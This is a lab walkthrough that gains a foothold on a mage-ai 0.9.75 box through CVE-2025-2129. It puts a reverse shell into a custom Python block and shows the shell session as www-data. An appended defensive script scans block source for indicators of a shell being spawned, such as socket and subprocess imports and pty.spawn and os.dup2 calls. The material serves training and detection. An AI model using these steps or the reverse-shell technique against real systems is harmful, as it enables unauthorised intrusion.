Remote Code Execution


The target mage-ai instance has been identified as vulnerable to CVE-2025-2129 due to its outdated version, 0.9.75.

Creating a new pipeline; CVE-2025-2129

Then I will create a new custom Python block.

A new Python block has been created with default content inside.

I will replace the content with a reverse shell.

Then I simply click to run the block.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zab]
└─$ nnc 9999                                                                   
listening on [any] 9999 ...
connect to [192.168.45.155] from (UNKNOWN) [192.168.239.210] 40280
bash: cannot set terminal process group (1311): Inappropriate ioctl for device
bash: no job control in this shell
www-data@zab:~/html$ whoami
whoami
www-data
www-data@zab:~/html$ hostname
hostname
zab
www-data@zab:~/html$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:04:3d brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.239.210/24 brd 192.168.239.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the www-data account by exploiting CVE-2025-2129.
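From the defender's side, the step where a custom Python block's content is swapped for shell-spawning code can be caught by statically auditing block source before or after it runs. The following is an added example, not part of the original write-up or of Mage's own code; the indicator lists, function names and both sample sources are assumptions constructed for illustration.

```python
import ast

# Indicator lists are an assumption; tune them to what your pipelines really use.
RISKY_MODULES = {"socket", "subprocess", "pty"}
RISKY_CALLS = {"os.system", "os.popen", "os.dup2", "os.execv", "pty.spawn",
               "subprocess.Popen", "subprocess.call", "subprocess.run"}


def dotted_name(node):
    """Return 'a.b.c' for Name/Attribute chains, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def audit_block(source):
    """Parse (never execute) one block's source and return sorted findings."""
    findings = set()
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return ["unparseable"]
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in RISKY_MODULES:
                    findings.add("import:" + alias.name)
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in RISKY_MODULES:
                findings.add("import:" + node.module)
        elif isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in RISKY_CALLS or name in {"exec", "eval", "__import__"}:
                findings.add("call:" + name)
    return sorted(findings)


# Constructed samples (not from the page): a benign block and a tampered one.
BENIGN = "import pandas as pd\n\n@custom\ndef transform_custom(*args, **kwargs):\n    return {}\n"
TAMPERED = "import socket, subprocess, os\nos.dup2(0, 1)\nsubprocess.call(['id'])\n"

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("tampered", TAMPERED)):
        print(label, audit_block(src))
```

Findings are a triage signal, not a verdict: aliased imports and dynamically built names are not resolved, so pair this with process monitoring for shells spawned by the service account.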